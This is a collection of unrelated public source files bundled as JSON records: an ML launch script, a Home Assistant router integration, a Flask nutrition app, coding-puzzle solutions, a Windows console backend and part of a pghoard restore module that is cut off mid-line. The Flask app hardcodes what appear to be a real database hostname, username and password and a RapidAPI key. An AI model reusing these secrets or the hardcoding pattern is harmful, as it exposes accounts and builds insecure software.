parser.parse_args()\n return (args.tpus, args.tpu_version, args.prefix, args.zone, args.sweep, args.data_path, bool(args.cleanup),\n bool(args.preemptible), args.service_account, args.branch, args.slices)\n\n\ndef main():\n (tpus, tpu_version, prefix, zone, sweep_id, data_path, cleanup, preemptible,\n service_account, branch, slices) = parse_args()\n if cleanup:\n return delete_all(prefix, zone)\n\n def creation_callback(host: str, ctx: typing.Optional[Context]) -> Context:\n if ctx is None:\n return Context(zone=zone, host=host, sweep_id=sweep_id, data_path=data_path, branch=branch)\n return ctx\n\n start_multiple(prefix, tpu_version, zone, preemptible, service_account, slices, start_fn, creation_callback, tpus)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"HomebrewNLP/Olmax","sub_path":"script/launch_multiple_runs.py","file_name":"launch_multiple_runs.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"52"} +{"seq_id":"37544635260","text":"\"\"\"Represent the AsusWrt router.\"\"\"\nfrom datetime import datetime, timedelta\nimport logging\nfrom typing import Any, Dict, Optional\n\nfrom aioasuswrt.asuswrt import AsusWrt\n\nfrom homeassistant.components.device_tracker.const import (\n CONF_CONSIDER_HOME,\n DEFAULT_CONSIDER_HOME,\n DOMAIN as TRACKER_DOMAIN,\n)\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import (\n CONF_HOST,\n CONF_MODE,\n CONF_PASSWORD,\n CONF_PORT,\n CONF_PROTOCOL,\n CONF_USERNAME,\n)\nfrom homeassistant.core import CALLBACK_TYPE, callback\nfrom homeassistant.exceptions import ConfigEntryNotReady\nfrom homeassistant.helpers.dispatcher import async_dispatcher_send\nfrom homeassistant.helpers.event import async_track_time_interval\nfrom homeassistant.helpers.typing import HomeAssistantType\nfrom homeassistant.util import dt as dt_util\n\nfrom .const import (\n CONF_DNSMASQ,\n CONF_INTERFACE,\n CONF_REQUIRE_IP,\n CONF_SSH_KEY,\n CONF_TRACK_UNKNOWN,\n DEFAULT_DNSMASQ,\n DEFAULT_INTERFACE,\n DEFAULT_TRACK_UNKNOWN,\n DOMAIN,\n PROTOCOL_TELNET,\n)\n\nCONF_REQ_RELOAD = [CONF_DNSMASQ, CONF_INTERFACE, CONF_REQUIRE_IP]\nSCAN_INTERVAL = timedelta(seconds=30)\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass AsusWrtDevInfo:\n \"\"\"Representation of a AsusWrt device info.\"\"\"\n\n def __init__(self, mac, name=None):\n \"\"\"Initialize a AsusWrt device info.\"\"\"\n self._mac = mac\n self._name = name\n self._ip_address = None\n self._last_activity = None\n self._connected = False\n\n def update(self, dev_info=None, consider_home=0):\n \"\"\"Update AsusWrt device info.\"\"\"\n utc_point_in_time = dt_util.utcnow()\n if dev_info:\n if not self._name:\n self._name = dev_info.name or self._mac.replace(\":\", \"_\")\n self._ip_address = dev_info.ip\n self._last_activity = utc_point_in_time\n self._connected = True\n\n elif self._connected:\n self._connected = (\n utc_point_in_time - self._last_activity\n ).total_seconds() < consider_home\n self._ip_address = None\n\n @property\n def is_connected(self):\n \"\"\"Return connected status.\"\"\"\n return self._connected\n\n @property\n def mac(self):\n \"\"\"Return device mac address.\"\"\"\n return self._mac\n\n @property\n def name(self):\n \"\"\"Return device name.\"\"\"\n return self._name\n\n @property\n def ip_address(self):\n \"\"\"Return device ip address.\"\"\"\n return self._ip_address\n\n @property\n def last_activity(self):\n \"\"\"Return device last activity.\"\"\"\n return self._last_activity\n\n\nclass AsusWrtRouter:\n \"\"\"Representation of a AsusWrt router.\"\"\"\n\n def __init__(self, hass: HomeAssistantType, entry: ConfigEntry) -> None:\n \"\"\"Initialize a AsusWrt router.\"\"\"\n self.hass = hass\n self._entry = entry\n\n self._api: AsusWrt = None\n self._protocol = entry.data[CONF_PROTOCOL]\n self._host = entry.data[CONF_HOST]\n\n self._devices: Dict[str, Any] = {}\n self._connect_error = False\n\n self._on_close = []\n\n self._options = {\n CONF_DNSMASQ: DEFAULT_DNSMASQ,\n CONF_INTERFACE: DEFAULT_INTERFACE,\n CONF_REQUIRE_IP: True,\n }\n self._options.update(entry.options)\n\n async def setup(self) -> None:\n \"\"\"Set up a AsusWrt router.\"\"\"\n self._api = get_api(self._entry.data, self._options)\n\n try:\n await self._api.connection.async_connect()\n except OSError as exp:\n raise ConfigEntryNotReady from exp\n\n if not self._api.is_connected:\n raise ConfigEntryNotReady\n\n # Load tracked entities from registry\n entity_registry = await self.hass.helpers.entity_registry.async_get_registry()\n track_entries = (\n self.hass.helpers.entity_registry.async_entries_for_config_entry(\n entity_registry, self._entry.entry_id\n )\n )\n for entry in track_entries:\n if entry.domain == TRACKER_DOMAIN:\n self._devices[entry.unique_id] = AsusWrtDevInfo(\n entry.unique_id, entry.original_name\n )\n\n # Update devices\n await self.update_devices()\n\n self.async_on_close(\n async_track_time_interval(self.hass, self.update_all, SCAN_INTERVAL)\n )\n\n async def update_all(self, now: Optional[datetime] = None) -> None:\n \"\"\"Update all AsusWrt platforms.\"\"\"\n await self.update_devices()\n\n async def update_devices(self) -> None:\n \"\"\"Update AsusWrt devices tracker.\"\"\"\n new_device = False\n _LOGGER.debug(\"Checking devices for ASUS router %s\", self._host)\n try:\n wrt_devices = await self._api.async_get_connected_devices()\n except OSError as exc:\n if not self._connect_error:\n self._connect_error = True\n _LOGGER.error(\n \"Error connecting to ASUS router %s for device update: %s\",\n self._host,\n exc,\n )\n return\n\n if self._connect_error:\n self._connect_error = False\n _LOGGER.info(\"Reconnected to ASUS router %s\", self._host)\n\n consider_home = self._options.get(\n CONF_CONSIDER_HOME, DEFAULT_CONSIDER_HOME.total_seconds()\n )\n track_unknown = self._options.get(CONF_TRACK_UNKNOWN, DEFAULT_TRACK_UNKNOWN)\n\n for device_mac in self._devices:\n dev_info = wrt_devices.get(device_mac)\n self._devices[device_mac].update(dev_info, consider_home)\n\n for device_mac, dev_info in wrt_devices.items():\n if device_mac in self._devices:\n continue\n if not track_unknown and not dev_info.name:\n continue\n new_device = True\n device = AsusWrtDevInfo(device_mac)\n device.update(dev_info)\n self._devices[device_mac] = device\n\n async_dispatcher_send(self.hass, self.signal_device_update)\n if new_device:\n async_dispatcher_send(self.hass, self.signal_device_new)\n\n async def close(self) -> None:\n \"\"\"Close the connection.\"\"\"\n if self._api is not None:\n if self._protocol == PROTOCOL_TELNET:\n self._api.connection.disconnect()\n self._api = None\n\n for func in self._on_close:\n func()\n self._on_close.clear()\n\n @callback\n def async_on_close(self, func: CALLBACK_TYPE) -> None:\n \"\"\"Add a function to call when router is closed.\"\"\"\n self._on_close.append(func)\n\n def update_options(self, new_options: Dict) -> bool:\n \"\"\"Update router options.\"\"\"\n req_reload = False\n for name, new_opt in new_options.items():\n if name in (CONF_REQ_RELOAD):\n old_opt = self._options.get(name)\n if not old_opt or old_opt != new_opt:\n req_reload = True\n break\n\n self._options.update(new_options)\n return req_reload\n\n @property\n def signal_device_new(self) -> str:\n \"\"\"Event specific per AsusWrt entry to signal new device.\"\"\"\n return f\"{DOMAIN}-device-new\"\n\n @property\n def signal_device_update(self) -> str:\n \"\"\"Event specific per AsusWrt entry to signal updates in devices.\"\"\"\n return f\"{DOMAIN}-device-update\"\n\n @property\n def host(self) -> str:\n \"\"\"Return router hostname.\"\"\"\n return self._host\n\n @property\n def devices(self) -> Dict[str, Any]:\n \"\"\"Return devices.\"\"\"\n return self._devices\n\n @property\n def api(self) -> AsusWrt:\n \"\"\"Return router API.\"\"\"\n return self._api\n\n\ndef get_api(conf: Dict, options: Optional[Dict] = None) -> AsusWrt:\n \"\"\"Get the AsusWrt API.\"\"\"\n opt = options or {}\n\n return AsusWrt(\n conf[CONF_HOST],\n conf[CONF_PORT],\n conf[CONF_PROTOCOL] == PROTOCOL_TELNET,\n conf[CONF_USERNAME],\n conf.get(CONF_PASSWORD, \"\"),\n conf.get(CONF_SSH_KEY, \"\"),\n conf[CONF_MODE],\n opt.get(CONF_REQUIRE_IP, True),\n interface=opt.get(CONF_INTERFACE, DEFAULT_INTERFACE),\n dnsmasq=opt.get(CONF_DNSMASQ, DEFAULT_DNSMASQ),\n )\n","repo_name":"fpetillo/home-assistant","sub_path":"homeassistant/components/asuswrt/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":8382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43181823554","text":"from flask import Flask, render_template, request\r\nimport os\r\nimport numpy as np\r\nfrom tensorflow.keras.models import load_model\r\nfrom tensorflow.keras.preprocessing import image\r\nfrom flask import session\r\nfrom flask import Flask, redirect, url_for\r\nimport requests\r\nimport json\r\nimport ibm_db\r\n\r\napp = Flask(__name__, template_folder=\"templates\")\r\napp.secret_key = 'NutritionAnalyzer'\r\nmodel = load_model('NutritionAnalyser.h5')\r\n\r\ndef connectToDB():\r\n try:\r\n connection = ibm_db.connect(\"DATABASE=bludb;\\\r\n HOSTNAME=125f9f61-9715-46f9-9399-c8177b21803b.c1ogj3sd0tgtu0lqde00.databases.appdomain.cloud;\\\r\n PORT=30426;\\\r\n Security=SSL;\\\r\n SSLServerCertificate=DigiCertGlobalRootCA.crt;\\\r\n UID=qlj81410;\\\r\n PWD=phBPVWNuoifGiYIC;\", \"\", \"\")\r\n print(\"Connected to DB!\")\r\n return connection\r\n except:\r\n print(\"error while connecting \", ibm_db.conn_errormsg())\r\n return 0\r\n\r\n\r\nconnection = connectToDB()\r\n\r\n@app.route('/Classify')\r\ndef index():\r\n return render_template('classify.html')\r\n\r\n@app.route(\"/\")\r\n@app.route('/home')\r\ndef home():\r\n return render_template('home.html')\r\n\r\n\r\n@app.route('/predict', methods=['GET', 'POST'])\r\ndef predict():\r\n if request.method == 'POST':\r\n f = request.files['file']\r\n basepath = os.path.dirname('__file__')\r\n filepath = os.path.join(basepath, \"test\", f.filename)\r\n f.save(filepath)\r\n\r\n img = image.load_img(filepath, target_size=(64, 64))\r\n x = image.img_to_array(img)\r\n x = np.expand_dims(x, axis=0)\r\n\r\n pred = np.argmax(model.predict(x), axis=1)\r\n index = ['APPLES', 'BANANA', 'ORANGE', 'PINEAPPLE', 'WATERMELON']\r\n\r\n predictedValue = str(index[pred[0]])\r\n\r\n result = nutrition(predictedValue)\r\n\r\n\r\n temp = result.json()[\"items\"]\r\n items = temp[0]\r\n print(items)\r\n sugar = items[\"sugar_g\"]\r\n fiber = items[\"fiber_g\"]\r\n sodium = items[\"sodium_mg\"]\r\n potassium = items[\"potassium_mg\"]\r\n fat_saturated = items[\"fat_saturated_g\"]\r\n fat_total = items[\"fat_total_g\"]\r\n calories = items[\"calories\"]\r\n cholesterol = items[\"cholesterol_mg\"]\r\n protein = items[\"protein_g\"]\r\n carbohydrates = items[\"carbohydrates_total_g\"]\r\n return render_template(\"result.html\", name=(predictedValue), sugar=(sugar), fiber=(fiber), sodium=(sodium), potassium=(potassium), fat_saturated=(fat_saturated), fat_total=(fat_total), calories=(calories), cholesterol=(cholesterol), protein=(protein), carbohydrates=(carbohydrates))\r\n\r\n\r\ndef nutrition(index):\r\n\r\n url = \"https://calorieninjas.p.rapidapi.com/v1/nutrition\"\r\n\r\n querystring = {\"query\": index}\r\n\r\n headers = {\r\n 'x-rapidapi-key': \"5d797ab107mshe668f26bd044e64p1ffd34jsnf47bfa9a8ee4\",\r\n 'x-rapidapi-host': \"calorieninjas.p.rapidapi.com\"\r\n }\r\n\r\n response = requests.request(\r\n \"GET\", url, headers=headers, params=querystring)\r\n\r\n print(\"from api \"+response.text)\r\n return response\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=False)\r\n","repo_name":"IBM-EPBL/IBM-Project-33204-1660215949","sub_path":"Final Deliveribles/Web Application/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3630627040","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n# Complete the minimumBribes function below.\ndef minimumBribes(q):\n org_list = []\n for index in range(len(q)):\n org_list.append((q[index], index))\n\n org_list.sort(key=lambda u: u[0])\n count = 0\n for i in range(len(q)):\n j_index = 0\n for j in range(i, len(q)):\n if org_list[j][1] == i:\n j_index = j\n break\n\n if j_index - i > 2:\n count = sys.maxsize\n break\n count += j_index - i\n tmp = j_index\n while tmp != i:\n org_list[tmp], org_list[tmp - 1] = org_list[tmp - 1], org_list[tmp]\n tmp -= 1\n\n if count == sys.maxsize:\n print(\"Too chaotic\")\n else:\n print(count)\n\n\nif __name__ == '__main__':\n t = int(input())\n\n for t_itr in range(t):\n n = int(input())\n\n q = list(map(int, input().rstrip().split()))\n\n minimumBribes(q)\n","repo_name":"encgoo/hackerrank","sub_path":"ConstructiveAlgorithms/new_year_chaos.py","file_name":"new_year_chaos.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36417487513","text":"from exporters.groupers.base_grouper import BaseGrouper\nfrom exporters.utils import str_list\n\n\nclass FileKeyGrouper(BaseGrouper):\n \"\"\"\n Groups items depending on their keys. It adds the group membership information to items.\n\n - keys (list)\n A list of keys to group by\n \"\"\"\n supported_options = {\n 'keys': {'type': str_list}\n }\n\n def __init__(self, *args, **kwargs):\n super(FileKeyGrouper, self).__init__(*args, **kwargs)\n self.keys = self.read_option('keys', [])\n\n def _get_nested_value(self, item, key):\n if '.' in key:\n first_key, rest = key.split('.', 1)\n return self._get_nested_value(item.get(first_key, {}), rest)\n else:\n membership = item.get(key, 'unknown')\n if membership is None:\n membership = 'unknown'\n return membership\n\n def group_batch(self, batch):\n for item in batch:\n item.group_key = self.keys\n membership = []\n for key in self.keys:\n membership.append(self._get_nested_value(item, key))\n item.group_membership = tuple(membership)\n yield item\n","repo_name":"scrapinghub/exporters","sub_path":"exporters/groupers/file_key_grouper.py","file_name":"file_key_grouper.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"52"} +{"seq_id":"6837577879","text":"import time\nfrom selenium.common.exceptions import NoSuchElementException\n\ndef test_button_is_exist(browser):\n link = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n browser.get(link)\n try:\n browser.find_element_by_xpath(\"//button[@class='btn btn-lg btn-primary btn-add-to-basket']\")\n except NoSuchElementException:\n assert False, \"button is not exist\"\n\n time.sleep(30)","repo_name":"Inna666/stepic_course_3_6","sub_path":"test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32193162708","text":"from collections import Counter\n\nnum_cases = int(input())\n\n\ndef beautifulCounter(tower_colors):\n beautiful_counter = 0\n for i in range(0, len(tower_colors) - 1):\n if tower_colors[i] != tower_colors[i+1]:\n beautiful_counter += 1\n return beautiful_counter\n\n\ndef colorCounter(tower1_colors, tower2_colors):\n rCounter = 0\n bCounter = 0\n\n rCounter = Counter(tower1_colors) + Counter(tower2_colors)\n bCounter = Counter(tower1_colors) + Counter(tower2_colors)\n\n x = abs(rCounter['R'] - bCounter['B'])\n return x\n\n\nfor i in range(0, num_cases):\n check = 0\n tower1_size, tower2_size = input().split()\n tower1_colors = input()\n tower2_colors = input()\n\n if (len(tower1_colors) != 1 or len(tower2_colors) != 1):\n check = colorCounter(tower1_colors, tower2_colors)\n\n if check > 1:\n print('NO')\n\n else:\n beautiful_counter = beautifulCounter(\n tower1_colors) + beautifulCounter(tower2_colors)\n\n if beautiful_counter == (len(tower1_colors) - 1) + (len(tower2_colors)-1):\n print('YES')\n elif tower1_colors[len(tower1_colors)-1] != tower2_colors[len(tower2_colors)-1]:\n print('YES')\n else:\n print('NO')\n","repo_name":"Vinicius203/Codeforces","sub_path":"tempCodeRunnerFile.py","file_name":"tempCodeRunnerFile.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71738632805","text":"from .common import Window\nfrom .matrix import CharMap\n\nimport win32con\nimport win32file\nfrom win32console import *\n\nfrom time import sleep\n\n\nclass Application:\n def __init__(self, shell):\n self.shell = shell\n\n self.console = PyConsoleScreenBufferType(win32file.CreateFile(\n \"CONIN$\",\n win32con.GENERIC_READ | win32con.GENERIC_WRITE,\n win32con.FILE_SHARE_READ,\n None,\n win32con.OPEN_EXISTING,\n 0,\n 0\n ))\n self.console.SetConsoleMode(ENABLE_WINDOW_INPUT | ENABLE_MOUSE_INPUT)\n self.buffer = CreateConsoleScreenBuffer()\n self.buffer.SetConsoleActiveScreenBuffer()\n\n size, _ = self.buffer.GetConsoleCursorInfo()\n self.buffer.SetConsoleCursorInfo(size, False)\n\n self.matrix = CharMap(self.w, self.h)\n self.mpos = (0, 0) # mouse position\n\n def exit(self):\n size, _ = self.buffer.GetConsoleCursorInfo()\n self.buffer.SetConsoleCursorInfo(size, True)\n\n self.buffer.Close()\n\n @property\n def w(self):\n return self.buffer.GetConsoleScreenBufferInfo()[\"Size\"].X\n\n @property\n def h(self):\n return self.buffer.GetConsoleScreenBufferInfo()[\"Size\"].Y\n\n def inputs(self):\n while self.shell.go:\n # poll for events before blocking and getting them\n # because the block prevents output from showing up\n while self.console.GetNumberOfConsoleInputEvents() < 1:\n sleep(0.01)\n\n for input in self.console.ReadConsoleInput(1):\n if input.EventType == KEY_EVENT:\n if input.KeyDown:\n if input.Char == '\\0':\n pass # FIXME - virtual key\n\n elif input.Char == '\\x03': # ctrl-c\n raise KeyboardInterrupt()\n\n else:\n self.shell.on_key(ord(input.Char))\n\n elif input.EventType == MOUSE_EVENT:\n flags = input.EventFlags # 1=push, 2=click, 4=scroll\n pos = input.MousePosition\n btn = input.ButtonState\n scroll = -1 if btn & 4287102976 == 4287102976 else \\\n 1 if btn & 7864320 == 7864320 else 0\n\n if not scroll: # mouse position not reliable while scrolling\n self.mpos = (pos.X, pos.Y)\n\n self.shell.on_mouse(self.mpos[0], self.mpos[1],\n True if btn & 1 == 1 else False,\n True if btn & 4 == 4 else False,\n True if btn & 2 == 2 else False,\n scroll\n )\n\n def clear(self):\n self.buffer.FillConsoleOutputCharacter(' ', self.w * self.h,\n PyCOORDType(0, 0))\n\n def write(self, x, y, txt):\n self.buffer.WriteConsoleOutputCharacter(txt, PyCOORDType(x, y))\n\n def refresh(self):\n for y in range(self.matrix.h):\n chars = self.matrix.chars[y]\n changes = self.matrix.changes[y]\n\n for x in range(self.matrix.w):\n if changes[x]:\n c = chars[x]\n self.buffer.WriteConsoleOutputCharacter(\n '.' if c is None else c, PyCOORDType(x, y))\n changes[x] = False\n\n","repo_name":"lannocc/appscii","sub_path":"appscii/backend/win32.py","file_name":"win32.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"6079282926","text":"from . import common, config, logutil, version\nfrom .patchedtarfile import tarfile\nfrom .postgres_command import PGHOARD_HOST, PGHOARD_PORT\nfrom concurrent import futures\n# ignore pylint/distutils issue, https://github.com/PyCQA/pylint/issues/73\nfrom distutils.version import LooseVersion # pylint: disable=no-name-in-module,import-error\nfrom pghoard.rohmu import compat, dates, get_transfer, IO_BLOCK_SIZE, rohmufile\nfrom pghoard.rohmu.errors import Error, InvalidConfigurationError\nfrom psycopg2.extensions import adapt\nfrom requests import Session\nimport argparse\nimport datetime\nimport io\nimport logging\nimport os\nimport re\nimport shutil\nimport sys\nimport tempfile\nimport time\n\n\nclass RestoreError(Error):\n \"\"\"Restore error\"\"\"\n\n\ndef create_recovery_conf(dirpath, site, *,\n port=PGHOARD_PORT,\n primary_conninfo=None,\n recovery_end_command=None,\n recovery_target_action=None,\n recovery_target_name=None,\n recovery_target_time=None,\n recovery_target_xid=None,\n restore_to_master=None):\n restore_command = [\n \"pghoard_postgres_command\",\n \"--mode\", \"restore\",\n \"--port\", str(port),\n \"--site\", site,\n \"--output\", \"%p\",\n \"--xlog\", \"%f\",\n ]\n lines = [\n \"# pghoard created recovery.conf\",\n \"recovery_target_timeline = 'latest'\",\n \"trigger_file = {}\".format(adapt(os.path.join(dirpath, \"trigger_file\"))),\n \"restore_command = '{}'\".format(\" \".join(restore_command)),\n ]\n if not restore_to_master:\n lines.append(\"standby_mode = 'on'\")\n if primary_conninfo:\n lines.append(\"primary_conninfo = {}\".format(adapt(primary_conninfo)))\n if recovery_end_command:\n lines.append(\"recovery_end_command = {}\".format(adapt(recovery_end_command)))\n if recovery_target_action:\n with open(os.path.join(dirpath, \"PG_VERSION\"), \"r\") as fp:\n pg_version = fp.read().strip()\n if LooseVersion(pg_version) >= \"9.5\":\n lines.append(\"recovery_target_action = '{}'\".format(recovery_target_action))\n elif recovery_target_action == \"promote\":\n pass # default action\n elif recovery_target_action == \"pause\":\n lines.append(\"pause_at_recovery_target = True\")\n else:\n print(\"Unsupported recovery_target_action {!r} for PostgreSQL {}, ignoring\".format(\n recovery_target_action, pg_version))\n if recovery_target_name:\n lines.append(\"recovery_target_name = '{}'\".format(recovery_target_name))\n if recovery_target_time:\n lines.append(\"recovery_target_time = '{}'\".format(recovery_target_time))\n if recovery_target_xid:\n lines.append(\"recovery_target_xid = '{}'\".format(recovery_target_xid))\n content = \"\\n\".join(lines) + \"\\n\"\n filepath = os.path.join(dirpath, \"recovery.conf\")\n filepath_tmp = filepath + \".tmp\"\n with open(filepath_tmp, \"w\") as fp:\n fp.write(content)\n os.rename(filepath_tmp, filepath)\n return content\n\n\ndef print_basebackup_list(basebackups, *, caption=\"Available basebackups\", verbose=True):\n print(caption, \"\\n\")\n fmt = \"{name:40} {size:>11} {orig_size:>11} {time:20}\".format\n print(fmt(name=\"Basebackup\", size=\"Backup size\", time=\"Start time\", orig_size=\"Orig size\"))\n print(fmt(name=\"-\" * 40, size=\"-\" * 11, time=\"-\" * 20, orig_size=\"-\" * 11))\n for b in sorted(basebackups, key=lambda b: b[\"name\"]):\n meta = b[\"metadata\"].copy()\n lm = meta.pop(\"start-time\")\n if isinstance(lm, str):\n lm = dates.parse_timestamp(lm)\n if lm.tzinfo:\n lm = lm.astimezone(datetime.timezone.utc).replace(tzinfo=None)\n lm_str = lm.isoformat()[:19] + \"Z\" # # pylint: disable=no-member\n size_str = \"{} MB\".format(b[\"size\"] // (1024 ** 2))\n orig_size = int(meta.pop(\"original-file-size\", 0) or 0)\n if orig_size:\n orig_size_str = \"{} MB\".format(orig_size // (1024 ** 2))\n else:\n orig_size_str = \"n/a\"\n print(fmt(name=b[\"name\"], size=size_str, time=lm_str, orig_size=orig_size_str))\n if verbose:\n print(\" metadata:\", meta)\n\n\nclass Restore:\n log_tracebacks = False\n\n def __init__(self):\n self.config = None\n self.log = logging.getLogger(\"PGHoardRestore\")\n self.storage = None\n\n def create_parser(self):\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-D\", \"--debug\", help=\"Enable debug logging\", action=\"store_true\")\n parser.add_argument(\"--version\", action='version', help=\"show program version\",\n version=version.__version__)\n sub = parser.add_subparsers(help=\"sub-command help\")\n\n def add_cmd(method):\n cp = sub.add_parser(method.__name__.replace(\"_\", \"-\"), help=method.__doc__)\n cp.set_defaults(func=method)\n return cp\n\n def generic_args(require_config=True, require_site=False):\n config_path = os.environ.get(\"PGHOARD_CONFIG\")\n cmd.add_argument(\"-v\", \"--verbose\", help=\"verbose output\", action=\"store_true\")\n if config_path:\n cmd.add_argument(\"--config\", help=\"pghoard config file\", default=config_path)\n else:\n cmd.add_argument(\"--config\", help=\"pghoard config file\", required=require_config)\n\n cmd.add_argument(\"--site\", help=\"pghoard site\", required=require_site)\n\n def host_port_args():\n cmd.add_argument(\"--host\", help=\"pghoard repository host\", default=PGHOARD_HOST)\n cmd.add_argument(\"--port\", help=\"pghoard repository port\", default=PGHOARD_PORT)\n\n def target_args():\n cmd.add_argument(\"--basebackup\", help=\"pghoard basebackup\", default=\"latest\")\n cmd.add_argument(\"--primary-conninfo\", help=\"replication.conf primary_conninfo\", default=\"\")\n cmd.add_argument(\"--target-dir\", help=\"pghoard restore target 'pgdata' dir\", required=True)\n cmd.add_argument(\"--overwrite\", help=\"overwrite existing target directory\",\n default=False, action=\"store_true\")\n cmd.add_argument(\"--tablespace-dir\", metavar=\"NAME=DIRECTORY\", action=\"append\",\n help=\"map the given tablespace to an existing empty directory; \"\n \"this option can be used multiple times to map multiple tablespaces\")\n cmd.add_argument(\"--recovery-end-command\", help=\"PostgreSQL recovery_end_command\", metavar=\"COMMAND\")\n cmd.add_argument(\"--recovery-target-action\", help=\"PostgreSQL recovery_target_action\",\n choices=[\"pause\", \"promote\", \"shutdown\"])\n cmd.add_argument(\"--recovery-target-name\", help=\"PostgreSQL recovery_target_name\", metavar=\"RESTOREPOINT\")\n cmd.add_argument(\"--recovery-target-time\", help=\"PostgreSQL recovery_target_time\", metavar=\"ISO_TIMESTAMP\")\n cmd.add_argument(\"--recovery-target-xid\", help=\"PostgreSQL recovery_target_xid\", metavar=\"XID\")\n cmd.add_argument(\"--restore-to-master\", help=\"Restore the database to a PG master\", action=\"store_true\")\n\n cmd = add_cmd(self.list_basebackups_http)\n host_port_args()\n generic_args(require_config=False, require_site=True)\n\n cmd = add_cmd(self.list_basebackups)\n generic_args()\n\n cmd = add_cmd(self.get_basebackup)\n target_args()\n generic_args()\n\n return parser\n\n def list_basebackups_http(self, arg):\n \"\"\"List available basebackups from a HTTP source\"\"\"\n self.storage = HTTPRestore(arg.host, arg.port, arg.site)\n self.storage.show_basebackup_list(verbose=arg.verbose)\n\n def _get_object_storage(self, site, pgdata):\n storage_config = common.get_object_storage_config(self.config, site)\n storage = get_transfer(storage_config)\n return ObjectStore(storage, self.config[\"backup_sites\"][site][\"prefix\"], site, pgdata)\n\n def list_basebackups(self, arg):\n \"\"\"List basebackups from an object store\"\"\"\n self.config = config.read_json_config_file(arg.config, check_commands=False, check_pgdata=False)\n site = config.get_site_from_config(self.config, arg.site)\n self.storage = self._get_object_storage(site, pgdata=None)\n self.storage.show_basebackup_list(verbose=arg.verbose)\n\n def get_basebackup(self, arg):\n \"\"\"Download a basebackup from an object store\"\"\"\n if not arg.tablespace_dir:\n tablespace_mapping = {}\n else:\n try:\n tablespace_mapping = dict(v.split(\"=\", 1) for v in arg.tablespace_dir)\n except ValueError:\n raise RestoreError(\"Invalid tablespace mapping {!r}\".format(arg.tablespace_dir))\n\n self.config = config.read_json_config_file(arg.config, check_commands=False, check_pgdata=False)\n site = config.get_site_from_config(self.config, arg.site)\n try:\n self.storage = self._get_object_storage(site, arg.target_dir)\n self._get_basebackup(\n pgdata=arg.target_dir,\n basebackup=arg.basebackup,\n site=site,\n primary_conninfo=arg.primary_conninfo,\n recovery_end_command=arg.recovery_end_command,\n recovery_target_action=arg.recovery_target_action,\n recovery_target_name=arg.recovery_target_name,\n recovery_target_time=arg.recovery_target_time,\n recovery_target_xid=arg.recovery_target_xid,\n restore_to_master=arg.restore_to_master,\n overwrite=arg.overwrite,\n tablespace_mapping=tablespace_mapping,\n )\n except RestoreError:\n raise\n except Exception as ex:\n if self.log_tracebacks:\n self.log.exception(\"Unexpected _get_basebackup failure\")\n raise RestoreError(\"{}: {}\".format(ex.__class__.__name__, ex))\n\n def _find_nearest_basebackup(self, recovery_target_time=None):\n applicable_basebackups = []\n\n basebackups = self.storage.list_basebackups()\n for basebackup in basebackups:\n if recovery_target_time:\n # We really need the backup end time here, but pg_basebackup based backup methods don't provide\n # it for us currently, so fall back to using start-time.\n if \"end-time\" in basebackup[\"metadata\"]:\n backup_ts = dates.parse_timestamp(basebackup[\"metadata\"][\"end-time\"])\n else:\n backup_ts = dates.parse_timestamp(basebackup[\"metadata\"][\"start-time\"])\n if backup_ts >= recovery_target_time:\n continue\n applicable_basebackups.append(basebackup)\n\n if not applicable_basebackups:\n raise RestoreError(\"No applicable basebackups found, exiting\")\n\n # NOTE: as above, we may not have end-time so just sort by start-time, the order should be the same\n applicable_basebackups.sort(key=lambda basebackup: basebackup[\"metadata\"][\"start-time\"])\n caption = \"Found {} applicable basebackup{}\".format(\n len(applicable_basebackups),\n \"\" if len(applicable_basebackups) == 1 else \"s\")\n print_basebackup_list(applicable_basebackups, caption=caption)\n\n selected = applicable_basebackups[-1][\"name\"]\n print(\"\\nSelecting {!r} for restore\".format(selected))\n return selected\n\n def _extract_pghoard_bb_v1_v2(self, fileobj, pgdata, tablespaces):\n directories = []\n # | in mode to use tarfile's internal stream buffer manager, currently required because our SnappyFile\n # interface doesn't do proper buffering for reads\n with tarfile.open(fileobj=fileobj, mode=\"r|\", bufsize=IO_BLOCK_SIZE) as tar:\n for tarinfo in tar:\n if tarinfo.name in (\".pghoard_tar_metadata.json\", \"pgdata\", \"tablespaces\"):\n continue # ignore\n\n if tarinfo.name.startswith(\"pgdata/\"):\n target_name = os.path.join(pgdata, tarinfo.name[7:])\n elif tarinfo.name.startswith(\"tablespaces/\"):\n tscomponents = tarinfo.name.split(\"/\", 2)\n tsname = tscomponents[1]\n tspath = tablespaces[tsname][\"path\"]\n\n if len(tscomponents) == 2 and tarinfo.isdir():\n # Create tablespace entry\n tblspc_dir = os.path.join(pgdata, \"pg_tblspc\")\n os.makedirs(tblspc_dir, exist_ok=True)\n linkname = os.path.join(pgdata, \"pg_tblspc\", str(tablespaces[tsname][\"oid\"]))\n os.symlink(tspath, linkname)\n directories.append([tspath, tarinfo])\n continue\n\n target_name = os.path.join(tspath, tscomponents[2])\n else:\n raise Exception(\"Unrecognized path {!r} in tar\".format(tarinfo.name))\n\n if 